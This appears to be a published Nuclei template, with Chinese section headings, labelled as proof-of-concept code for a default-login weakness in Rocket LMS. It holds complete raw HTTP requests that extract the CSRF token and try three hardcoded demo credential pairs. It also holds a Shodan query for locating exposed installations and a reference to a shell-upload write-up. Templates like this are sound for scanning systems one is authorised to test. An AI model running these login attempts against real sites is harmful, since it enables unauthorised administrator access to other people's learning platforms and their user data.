漏洞描述
Rocket LMS default credentials were discovered.
rocketlms-default-login: Rocket LMS - Default Login
PoC代码[已公开]
id: rocketlms-default-login
info:
name: Rocket LMS - Default Login
author: hamad501
severity: high
description: |
Rocket LMS default credentials were discovered.
reference:
- https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
- https://github.com/Yucaerin/RocketLms
- https://medium.com/@naxtarrr/rocket-lms-shell-upload-vulnerability-c400665702f3
metadata:
verified: true
max-request: 4
vendor: rocketsoft
product: rocket-lms
shodan-query: html:"Rocket LMS"
tags: default-login,lms,rocketlms,vuln
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/login
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/login
Content-Type: application/x-www-form-urlencoded
_token={{token}}&type=email&email={{username}}&country_code=&mobile=&password={{password}}
attack: pitchfork
payloads:
username:
- admin@demo.com
- student@demo.com
- instructor@demo.com
password:
- admin
- student
- instructor
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/panel"
- type: status
status:
- 302
extractors:
- type: regex
part: body
name: token
internal: true
group: 1
regex:
- 'name="_token"\s+value="([^"]+)"'
# digest: 4b0a00483046022100b94234223068a258981837de7d09e19d316f7bf5461c0723031d5377272d114a0221008e8a7e4f95d6ea61019183a9a0346aba2df2677757238afbdb96efd07e5b4bea:922c64590222798bb761d5b6d8e72950